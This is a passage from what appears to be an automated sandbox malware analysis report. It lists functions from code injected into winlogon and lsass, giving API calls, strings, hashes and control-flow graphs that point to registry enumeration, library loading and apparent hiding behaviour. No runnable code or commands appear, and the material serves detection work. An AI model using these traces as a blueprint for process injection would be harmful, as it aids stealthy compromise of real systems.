                                                                      • Instruction Fuzzy Hash: 1AE08672600B4581DF028F61D4402E87360E7A8BB4B889232EE5C46355EA3CD2E9C700
                                                                      Function 000001F385BC1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction ID: 61c98598d725439005a8348cc94fee34ff644915bea9077b60c4904ec0b0c66d
                                                                      • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction Fuzzy Hash: E1119D35601B4681EE86CF66A4042BA63A0FBD9FE0F584234FE5D577A9DE3CC9428300
                                                                      Function 000001F385BC1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction ID: feab5681243c9ea3ef05db4ea452e02591ff6f6f4dae11f5b3763983b80706bc
                                                                      • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction Fuzzy Hash: F8E0ED3160160182EB458FA2D8083AA36E0FBE9FA2F84C024DD1807394DF3C8188C750

                                                                      Execution Graph

                                                                      Execution Coverage:0.9%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:119
                                                                      Total number of Limit Nodes:10
                                                                      execution_graph 14651 2a29199253c 14653 2a2919925bb 14651->14653 14652 2a2919927aa 14653->14652 14654 2a29199261d GetFileType 14653->14654 14655 2a29199262b StrCpyW 14654->14655 14656 2a291992641 14654->14656 14657 2a291992650 14655->14657 14667 2a291991a40 GetFinalPathNameByHandleW 14656->14667 14661 2a29199265a 14657->14661 14664 2a2919926ff 14657->14664 14660 2a291993844 StrCmpNIW 14660->14664 14661->14652 14672 2a291993844 14661->14672 14675 2a291993044 StrCmpIW 14661->14675 14679 2a291991cac 14661->14679 14664->14652 14664->14660 14665 2a291993044 4 API calls 14664->14665 14666 2a291991cac 2 API calls 14664->14666 14665->14664 14666->14664 14668 2a291991a6a StrCmpNIW 14667->14668 14669 2a291991aa9 14667->14669 14668->14669 14670 2a291991a84 lstrlenW 14668->14670 14669->14657 14670->14669 14671 2a291991a96 StrCpyW 14670->14671 14671->14669 14673 2a291993851 StrCmpNIW 14672->14673 14674 2a291993866 14672->14674 14673->14674 14674->14661 14676 2a29199308d PathCombineW 14675->14676 14677 2a291993076 StrCpyW StrCatW 14675->14677 14678 2a291993096 14676->14678 14677->14678 14678->14661 14680 2a291991cc3 14679->14680 14681 2a291991ccc 14679->14681 14683 2a29199152c 14680->14683 14681->14661 14684 2a29199157c 14683->14684 14685 2a291991546 14683->14685 14684->14681 14685->14684 14686 2a29199155d StrCmpIW 14685->14686 14687 2a291991565 StrCmpW 14685->14687 14686->14685 14687->14685 14688 2a291991abc 14693 2a291991628 GetProcessHeap HeapAlloc 14688->14693 14690 2a291991ad2 Sleep SleepEx 14691 2a291991acb 14690->14691 14691->14690 14692 2a291991598 StrCmpIW StrCmpW 14691->14692 14692->14691 14737 2a291991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14693->14737 14695 2a291991650 14738 2a291991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14695->14738 14697 2a291991661 14739 2a291991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14697->14739 14699 2a29199166a 14740 2a291991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14699->14740 14701 2a291991673 14702 2a29199168e RegOpenKeyExW 14701->14702 14703 2a2919916c0 RegOpenKeyExW 14702->14703 14704 2a2919918a6 14702->14704 14705 2a2919916ff RegOpenKeyExW 14703->14705 14706 2a2919916e9 14703->14706 14704->14691 14707 2a29199173a RegOpenKeyExW 14705->14707 14708 2a291991723 14705->14708 14741 2a2919912bc RegQueryInfoKeyW 14706->14741 14712 2a29199175e 14707->14712 14713 2a291991775 RegOpenKeyExW 14707->14713 14750 2a29199104c RegQueryInfoKeyW 14708->14750 14715 2a2919912bc 16 API calls 14712->14715 14716 2a2919917b0 RegOpenKeyExW 14713->14716 14717 2a291991799 14713->14717 14718 2a29199176b RegCloseKey 14715->14718 14720 2a2919917eb RegOpenKeyExW 14716->14720 14721 2a2919917d4 14716->14721 14719 2a2919912bc 16 API calls 14717->14719 14718->14713 14724 2a2919917a6 RegCloseKey 14719->14724 14722 2a29199180f 14720->14722 14723 2a291991826 RegOpenKeyExW 14720->14723 14725 2a2919912bc 16 API calls 14721->14725 14727 2a29199104c 6 API calls 14722->14727 14728 2a29199184a 14723->14728 14729 2a291991861 RegOpenKeyExW 14723->14729 14724->14716 14726 2a2919917e1 RegCloseKey 14725->14726 14726->14720 14730 2a29199181c RegCloseKey 14727->14730 14731 2a29199104c 6 API calls 14728->14731 14732 2a29199189c RegCloseKey 14729->14732 14733 2a291991885 14729->14733 14730->14723 14734 2a291991857 RegCloseKey 14731->14734 14732->14704 14735 2a29199104c 6 API calls 14733->14735 14734->14729 14736 2a291991892 RegCloseKey 14735->14736 14736->14732 14737->14695 14738->14697 14739->14699 14740->14701 14742 2a29199148a RegCloseKey 14741->14742 14743 2a291991327 GetProcessHeap HeapAlloc 14741->14743 14742->14705 14744 2a291991352 RegEnumValueW 14743->14744 14745 2a291991476 GetProcessHeap HeapFree 14743->14745 14746 2a2919913a5 14744->14746 14745->14742 14746->14744 14746->14745 14747 2a29199152c 2 API calls 14746->14747 14748 2a29199141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14746->14748 14749 2a2919913d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14746->14749 14747->14746 14748->14746 14749->14748 14751 2a2919911b5 RegCloseKey 14750->14751 14754 2a2919910bf 14750->14754 14751->14707 14752 2a2919910cf RegEnumValueW 14752->14754 14753 2a29199114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14753->14754 14754->14751 14754->14752 14754->14753 14755 2a29199202c 14756 2a29199205d 14755->14756 14757 2a291992173 14756->14757 14764 2a291992081 14756->14764 14768 2a29199213e 14756->14768 14758 2a2919921e7 14757->14758 14759 2a291992178 14757->14759 14761 2a2919921ec 14758->14761 14758->14768 14776 2a291992f04 GetProcessHeap HeapAlloc 14759->14776 14763 2a291992f04 11 API calls 14761->14763 14762 2a2919920b9 StrCmpNIW 14762->14764 14766 2a291992190 14763->14766 14764->14762 14765 2a2919920e0 14764->14765 14764->14768 14765->14764 14769 2a291991bf4 14765->14769 14766->14766 14766->14768 14770 2a291991c1b GetProcessHeap HeapAlloc 14769->14770 14771 2a291991c8f 14769->14771 14770->14771 14772 2a291991c56 14770->14772 14771->14765 14773 2a291991c77 GetProcessHeap HeapFree 14772->14773 14774 2a29199152c 2 API calls 14772->14774 14773->14771 14775 2a291991c6e 14774->14775 14775->14773 14780 2a291992f57 14776->14780 14777 2a291993015 GetProcessHeap HeapFree 14777->14766 14778 2a291993010 14778->14777 14779 2a291992fa2 StrCmpNIW 14779->14780 14780->14777 14780->14778 14780->14779 14781 2a291991bf4 6 API calls 14780->14781 14781->14780 14782 2a2911c273c 14785 2a2911c276a 14782->14785 14783 2a2911c2858 LoadLibraryA 14783->14785 14784 2a2911c28d4 14785->14783 14785->14784

                                                                      Executed Functions

                                                                      Function 000002A29199253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 5 2a29199253c-2a2919925c0 call 2a2919b2cc0 8 2a2919925c6-2a2919925c9 5->8 9 2a2919927d8-2a2919927fb 5->9 8->9 10 2a2919925cf-2a2919925dd 8->10 10->9 11 2a2919925e3-2a291992629 call 2a291998c60 * 3 GetFileType 10->11 18 2a29199262b-2a29199263f StrCpyW 11->18 19 2a291992641-2a29199264b call 2a291991a40 11->19 20 2a291992650-2a291992654 18->20 19->20 22 2a29199265a-2a291992673 call 2a2919930a8 call 2a291993844 20->22 23 2a2919926ff-2a291992704 20->23 35 2a2919926aa-2a2919926f4 call 2a2919b2cc0 22->35 36 2a291992675-2a2919926a4 call 2a2919930a8 call 2a291993044 call 2a291991cac 22->36 25 2a291992707-2a29199270c 23->25 27 2a29199270e-2a291992711 25->27 28 2a291992729 25->28 27->28 31 2a291992713-2a291992716 27->31 29 2a29199272c-2a291992745 call 2a2919930a8 call 2a291993844 28->29 47 2a291992787-2a291992789 29->47 48 2a291992747-2a291992776 call 2a2919930a8 call 2a291993044 call 2a291991cac 29->48 31->28 33 2a291992718-2a29199271b 31->33 33->28 37 2a29199271d-2a291992720 33->37 35->9 49 2a2919926fa 35->49 36->9 36->35 37->28 40 2a291992722-2a291992727 37->40 40->28 40->29 50 2a29199278b-2a2919927a5 47->50 51 2a2919927aa-2a2919927ad 47->51 48->47 68 2a291992778-2a291992783 48->68 49->22 50->25 54 2a2919927af-2a2919927b5 51->54 55 2a2919927b7-2a2919927ba 51->55 54->9 58 2a2919927bc-2a2919927bf 55->58 59 2a2919927d5 55->59 58->59 62 2a2919927c1-2a2919927c4 58->62 59->9 62->59 64 2a2919927c6-2a2919927c9 62->64 64->59 66 2a2919927cb-2a2919927ce 64->66 66->59 69 2a2919927d0-2a2919927d3 66->69 68->9 70 2a291992785 68->70 69->9 69->59 70->25
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction ID: b60ce313c48d00840e0b1213c085003e09fb0053b976659188ccf0f46ed53324
                                                                      • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction Fuzzy Hash: B0717F263007A2C7F6A99E2BDA483AF6694F38EF84F640026DD0953B8DDF35D64D8741
                                                                      Function 000002A29199202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 71 2a29199202c-2a291992057 call 2a2919b2d00 73 2a29199205d-2a291992066 71->73 74 2a29199206f-2a291992072 73->74 75 2a291992068-2a29199206c 73->75 76 2a291992223-2a291992243 74->76 77 2a291992078-2a29199207b 74->77 75->74 78 2a291992081-2a291992093 77->78 79 2a291992173-2a291992176 77->79 78->76 82 2a291992099-2a2919920a5 78->82 80 2a2919921e7-2a2919921ea 79->80 81 2a291992178-2a291992192 call 2a291992f04 79->81 80->76 86 2a2919921ec-2a2919921ff call 2a291992f04 80->86 81->76 91 2a291992198-2a2919921ae 81->91 84 2a2919920d3-2a2919920de call 2a291991bbc 82->84 85 2a2919920a7-2a2919920b7 82->85 92 2a2919920ff-2a291992111 84->92 99 2a2919920e0-2a2919920f8 call 2a291991bf4 84->99 85->84 88 2a2919920b9-2a2919920d1 StrCmpNIW 85->88 86->76 98 2a291992201-2a291992209 86->98 88->84 88->92 91->76 97 2a2919921b0-2a2919921cc 91->97 95 2a291992121-2a291992123 92->95 96 2a291992113-2a291992115 92->96 102 2a29199212a 95->102 103 2a291992125-2a291992128 95->103 100 2a29199211c-2a29199211f 96->100 101 2a291992117-2a29199211a 96->101 104 2a2919921d0-2a2919921e3 97->104 98->76 105 2a29199220b-2a291992213 98->105 99->92 111 2a2919920fa-2a2919920fd 99->111 108 2a29199212d-2a291992130 100->108 101->108 102->108 103->108 104->104 109 2a2919921e5 104->109 110 2a291992216-2a291992221 105->110 112 2a29199213e-2a291992141 108->112 113 2a291992132-2a291992138 108->113 109->76 110->76 110->110 111->108 112->76 114 2a291992147-2a29199214b 112->114 113->82 113->112 115 2a29199214d-2a291992150 114->115 116 2a291992162-2a29199216e 114->116 115->76 117 2a291992156-2a29199215b 115->117 116->76 117->114 118 2a29199215d 117->118 118->76
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: S$dialer
                                                                      • API String ID: 756756679-3873981283
                                                                      • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                      • Instruction ID: 31f48a6878fe19fac89be96b3cc806bef6c18fe058c887360822b4faed0dbcc7
                                                                      • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                      • Instruction Fuzzy Hash: BC519F76B10636C7FBADCB2BEA4866E63A5F70AB94F249011DE0512B49DF35C85DC301
                                                                      Function 000002A291991A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction ID: a357d2d52508768e3afd4e1e04428e6709925dc5c1eedb762baf769dbdce5509
                                                                      • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction Fuzzy Hash: 04F03622304652D3FBA08B2AFA8875A6761F75DF98FE44020DA4946598DE6CC64DCB01
                                                                      Function 000002A29199328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 1683269324-0
                                                                      • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction ID: 58e4f2d2b6d44b688d357d41d78580bd9e8a4ecd447c4753187665df867a6417
                                                                      • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction Fuzzy Hash: E4115E30750663C3F7E09F7BFB4E35B2294A79EF45FB04128991A41699EF78D28C8212
                                                                      Function 000002A291991ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 000002A291991628: GetProcessHeap.KERNEL32 ref: 000002A291991633
                                                                        • Part of subcall function 000002A291991628: HeapAlloc.KERNEL32 ref: 000002A291991642
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A2919916B2
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A2919916DF
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919916F9
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991719
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A291991734
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991754
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A29199176F
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A29199178F
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919917AA
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A2919917CA
                                                                      • Sleep.KERNEL32 ref: 000002A291991AD7
                                                                      • SleepEx.KERNELBASE ref: 000002A291991ADD
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919917E5
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991805
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A291991820
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991840
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A29199185B
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A29199187B
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A291991896
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919918A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1534210851-0
                                                                      • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction ID: 3c2d3c73657fef33275c25727780f265ec2bd7433f006fbc608fa0bc8dfbb08e
                                                                      • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction Fuzzy Hash: 2231ED61700662C3FBD09B2BD74936B13A5BB4EFE9F2854318E0B8729DEE14C45D8212
                                                                      Function 000002A2911C273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 176 2a2911c273c-2a2911c27a4 call 2a2911c29d4 * 4 185 2a2911c27aa-2a2911c27ad 176->185 186 2a2911c29b2 176->186 185->186 188 2a2911c27b3-2a2911c27b6 185->188 187 2a2911c29b4-2a2911c29d0 186->187 188->186 189 2a2911c27bc-2a2911c27bf 188->189 189->186 190 2a2911c27c5-2a2911c27e6 189->190 190->186 192 2a2911c27ec-2a2911c280c 190->192 193 2a2911c280e-2a2911c2836 192->193 194 2a2911c2838-2a2911c283f 192->194 193->193 193->194 195 2a2911c28df-2a2911c28e6 194->195 196 2a2911c2845-2a2911c2852 194->196 197 2a2911c28ec-2a2911c2901 195->197 198 2a2911c2992-2a2911c29b0 195->198 196->195 199 2a2911c2858-2a2911c286a LoadLibraryA 196->199 197->198 200 2a2911c2907 197->200 198->187 201 2a2911c28ca-2a2911c28d2 199->201 202 2a2911c286c-2a2911c2878 199->202 205 2a2911c290d-2a2911c2921 200->205 201->199 203 2a2911c28d4-2a2911c28d9 201->203 206 2a2911c28c5-2a2911c28c8 202->206 203->195 208 2a2911c2982-2a2911c298c 205->208 209 2a2911c2923-2a2911c2934 205->209 206->201 207 2a2911c287a-2a2911c287d 206->207 213 2a2911c287f-2a2911c28a5 207->213 214 2a2911c28a7-2a2911c28b7 207->214 208->198 208->205 211 2a2911c293f-2a2911c2943 209->211 212 2a2911c2936-2a2911c293d 209->212 216 2a2911c294d-2a2911c2951 211->216 217 2a2911c2945-2a2911c294b 211->217 215 2a2911c2970-2a2911c2980 212->215 218 2a2911c28ba-2a2911c28c1 213->218 214->218 215->208 215->209 219 2a2911c2963-2a2911c2967 216->219 220 2a2911c2953-2a2911c2961 216->220 217->215 218->206 219->215 222 2a2911c2969-2a2911c296c 219->222 220->215 222->215
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: b4be3b6af767c20a18f202599a4ffb0d2b1a842901df5322d96555700405c82d
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: B4610532B016B2D7DBA4CF1A900476E7392F755FA4F688121DE5907788EF38D85AE702

                                                                      Non-executed Functions

                                                                      Function 000002A291992B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 470 2a291992b2c-2a291992ba5 call 2a2919b2ce0 473 2a291992bab-2a291992bb1 470->473 474 2a291992ee0-2a291992f03 470->474 473->474 475 2a291992bb7-2a291992bba 473->475 475->474 476 2a291992bc0-2a291992bc3 475->476 476->474 477 2a291992bc9-2a291992bd9 GetModuleHandleA 476->477 478 2a291992bdb-2a291992beb GetProcAddress 477->478 479 2a291992bed 477->479 480 2a291992bf0-2a291992c0e 478->480 479->480 480->474 482 2a291992c14-2a291992c33 StrCmpNIW 480->482 482->474 483 2a291992c39-2a291992c3d 482->483 483->474 484 2a291992c43-2a291992c4d 483->484 484->474 485 2a291992c53-2a291992c5a 484->485 485->474 486 2a291992c60-2a291992c73 485->486 487 2a291992c83 486->487 488 2a291992c75-2a291992c81 486->488 489 2a291992c86-2a291992c8a 487->489 488->489 490 2a291992c9a 489->490 491 2a291992c8c-2a291992c98 489->491 492 2a291992c9d-2a291992ca7 490->492 491->492 493 2a291992d9d-2a291992da1 492->493 494 2a291992cad-2a291992cb0 492->494 497 2a291992ed2-2a291992eda 493->497 498 2a291992da7-2a291992daa 493->498 495 2a291992cc2-2a291992ccc 494->495 496 2a291992cb2-2a291992cbf call 2a29199199c 494->496 500 2a291992cce-2a291992cdb 495->500 501 2a291992d00-2a291992d0a 495->501 496->495 497->474 497->486 502 2a291992dbb-2a291992dc5 498->502 503 2a291992dac-2a291992db8 call 2a29199199c 498->503 500->501 507 2a291992cdd-2a291992cea 500->507 508 2a291992d3a-2a291992d3d 501->508 509 2a291992d0c-2a291992d19 501->509 504 2a291992df5-2a291992df8 502->504 505 2a291992dc7-2a291992dd4 502->505 503->502 515 2a291992dfa-2a291992e03 call 2a291991bbc 504->515 516 2a291992e05-2a291992e12 lstrlenW 504->516 505->504 514 2a291992dd6-2a291992de3 505->514 517 2a291992ced-2a291992cf3 507->517 511 2a291992d4b-2a291992d58 lstrlenW 508->511 512 2a291992d3f-2a291992d49 call 2a291991bbc 508->512 509->508 518 2a291992d1b-2a291992d28 509->518 520 2a291992d7b-2a291992d8d call 2a291993844 511->520 521 2a291992d5a-2a291992d64 511->521 512->511 524 2a291992d93-2a291992d98 512->524 522 2a291992de6-2a291992dec 514->522 515->516 532 2a291992e4a-2a291992e55 515->532 526 2a291992e35-2a291992e3f call 2a291993844 516->526 527 2a291992e14-2a291992e1e 516->527 517->524 525 2a291992cf9-2a291992cfe 517->525 528 2a291992d2b-2a291992d31 518->528 520->524 536 2a291992e42-2a291992e44 520->536 521->520 531 2a291992d66-2a291992d79 call 2a29199152c 521->531 522->532 533 2a291992dee-2a291992df3 522->533 524->536 525->501 525->517 526->536 527->526 537 2a291992e20-2a291992e33 call 2a29199152c 527->537 528->524 538 2a291992d33-2a291992d38 528->538 531->520 531->524 540 2a291992ecc-2a291992ed0 532->540 541 2a291992e57-2a291992e5b 532->541 533->504 533->522 536->497 536->532 537->526 537->532 538->508 538->528 540->497 545 2a291992e5d-2a291992e61 541->545 546 2a291992e63-2a291992e7d call 2a2919985c0 541->546 545->546 549 2a291992e80-2a291992e83 545->549 546->549 552 2a291992e85-2a291992ea3 call 2a2919985c0 549->552 553 2a291992ea6-2a291992ea9 549->553 552->553 553->540 555 2a291992eab-2a291992ec9 call 2a2919985c0 553->555 555->540
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction ID: 043e66a94291c1a102d958949189fb88a9b9732a4a50de77dbbc8e9e83f4211b
                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction Fuzzy Hash: 76B1A022311A62C3FBD88F6AD6487AA63A4F74AF84F645016EE0957798DF35CC4CC341
                                                                      Function 000002A291997D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction ID: 44736799373c9efb6451b95b64b9a47d87deab4c0848c0c6155269827a27a6b7
                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction Fuzzy Hash: 7C314C72305B91CAFBA49F65E8443EE7360F789B44F54402ADA4D47A98EF38C64CCB10
                                                                      Function 000002A29199D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction ID: c9b0c7b1d200b93522009db0479c6571555f4cb46859bdbeb309bed3194aa6ce
                                                                      • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction Fuzzy Hash: 50316332314B91C6EBA0CF2AE94439E73A4F78AB54F600115EA9D43B98DF38C54DCB01
                                                                      Function 000002A291991628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
